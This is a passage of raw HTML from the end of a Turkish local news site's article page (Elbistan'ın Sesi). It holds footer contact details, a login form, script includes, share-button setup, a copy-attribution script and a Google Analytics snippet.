src="http://www.elbistaninsesi.com/images/banner/Ysimsiz-1_1.jpg" alt="Elbistan’ın kotası 500 binden 450 bin tona düştü" /></a></div> </div> <div class="span4"> <p><center> 0 (344) 415 04 15 <br> gazete@elbistaninsesi.com <br>Kızılcaoba Mah. Kışla Cad. 19/1</center> </p> <p class="site-info glyphicons earphone">0 (344) 415 04 15</p> </div> </div> </div> <div id="footer-alt" class="row-fluid"> <div class="container center"> <div class="span3"> <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/m/" class="footer-alt-mobil glyphicons iphone"><strong>Mobil</strong>Mobil siteyi görüntüleyin.</a></div> </div> <div class="span3"> <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/kunye.html" class="footer-alt-reklam glyphicons global"><strong>Künye</strong>Künyeyi görüntüleyin.</a></div> </div> <div class="span3"> <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/iletisim.html" class="footer-alt-iletisim glyphicons headset"><strong>İletişim</strong>Bize ulaşın.</a></div> </div> <div class="span3"> <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/sitene-ekle.html" class="footer-alt-iletisim glyphicons embed_close"><strong>Sitene Ekle</strong>Güncel haberleri ekleyin.</a></div> </div> </div> </div> <div class="row-fluid"> <div class="container center"> <div class="span12 text-center"> <p>Bu sitede yayınlanan tüm materyalin her hakkı mahfuzdur. Kaynak gösterilse bile gazetemizin izni olmadan yayınlanamaz.</p> <p><a href="http://www.haber-sistemi.com" title="Haber Scripti">Haber Scripti</a> | <a href="http://www.tebilisim.com" title="TE Bilişim">TE Bilişim</a></p> </div> </div> </div> <div id="top" class="btn btn-inverse">Yukarı Çık</div> </div> <div id="uye" class="user modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true"> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> <h3 id="myModalLabel">Üye Girişi</h3> </div> <div class="modal-body"> <form class="form-horizontal" action="http://www.elbistaninsesi.com/index.php?m=login&rd=http%3A%2F%2Fwww.elbistaninsesi.com%2Fguncel%2Felbistanin-kotasi-500-binden-450-bin-tona-dustu-h37935.html" method="post"> <div class="control-group"> <label class="control-label" for="inputName">Kullanıcı Adı</label> <div class="controls"> <input id="inputName" value="" name="kullanici" type="text" placeholder="Kullanıcı Adı" required> </div> </div> <div class="control-group"> <label class="control-label" for="inputPassword">Şifre</label> <div class="controls"> <input type="password" value="" name="sifre" id="inputPassword" placeholder="Şifre" required> </div> </div> <div class="control-group"> <div class="controls"> <button type="submit" class="btn btn-info">Giriş Yap</button> </div> </div> </form> </div> <div class="modal-footer"> <a href="http://www.elbistaninsesi.com/uyelik.html" class="pull-left btn">Üye Ol</a> <a href="http://www.elbistaninsesi.com/unuttum.html" class="pull-left btn">Şifremi unuttum?</a> <button class="btn btn-danger" data-dismiss="modal" aria-hidden="true">Kapat</button> </div> </div> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery-1.9.1.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/modernizr.custom.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/classie.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/uisearch.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/login.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.showbizpro.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.cookie.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.mousewheel.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.scrollbar.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.cycle.all.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/base.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/waypoints.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/sticky.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/comments.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.pKisalt.min.js"></script><script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/getshares.min.js"></script><script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/moment.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/moment-tr.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.elevateZoom-3.0.8.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/system-min.js"></script> <script type="text/javascript">	new UISearch( document.getElementById( 'sb-search' ) );	$(function(){	});	$("#comment_list .text").pKisalt();	var gsTitle = document.querySelectorAll(".gs-title")[0].innerHTML;	var gsSpace = ' ';	var gsUrl = location.href;	new GetShare({ root: $(".gs-facebook"), network: "facebook", share: { }	});	new GetShare({ root: $(".gs-twitter"), network: "twitter", share: { message:gsTitle+gsSpace+gsUrl }	});	new GetShare({ root: $(".gs-google"), network: "googleplus", share: { }	});	new GetShare({ root: $(".gs-linkedin"), network: "linkedin", share: { }	});	jQuery('#anasayfayazar').showbizpro({	allEntryAtOnce:"on",	dragAndScroll:"off",	visibleElementsArray:[4,4,4,4],	carousel:"off",	heightOffsetBottom:0,	rewindFromEnd:"off",	autoPlay:"off",	delay:4000,	speed:750	});	jQuery('#gununmansetleri').showbizpro({	allEntryAtOnce:"on",	dragAndScroll:"off",	visibleElementsArray:[6,6,6,6],	carousel:"off",	heightOffsetBottom:0,	rewindFromEnd:"off",	autoPlay:"on",	delay:4000,	speed:750	});	$('#haber > .page-header').waypoint(function(direction) { $('#article-finished').toggleClass('hiding', direction === "up");	}, { offset: function() { return $.waypoints('viewportHeight') - $(this).height() - 750; }	});	function addLink() { var kisa_site_adi = "Elbistanın Sesi"; var kopyala_imza_onu = "Kaynak: http://www.elbistaninsesi.com"; var body_element = document.getElementsByTagName('body')[0]; var selection; selection = window.getSelection(); var pagelink = "<br><br>" + kopyala_imza_onu + "<a href='"+document.location.href+"'>"+document.location.href+"</a><br><br>" + kisa_site_adi; var copytext = selection + pagelink; var newdiv = document.createElement('div'); newdiv.style.position='absolute'; newdiv.style.left='-99999px'; body_element.appendChild(newdiv); newdiv.innerHTML = copytext; selection.selectAllChildren(newdiv); window.setTimeout(function() { body_element.removeChild(newdiv); },0);	}	document.oncopy = addLink;	tebilisim('37935', 'haber', ''); </script> <!-- Google Analytics --> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','ga'); ga('create', analitik_ga, 'auto'); ga('send', 'pageview'); </script> <!-- End Google Analytics --> </body> </html> 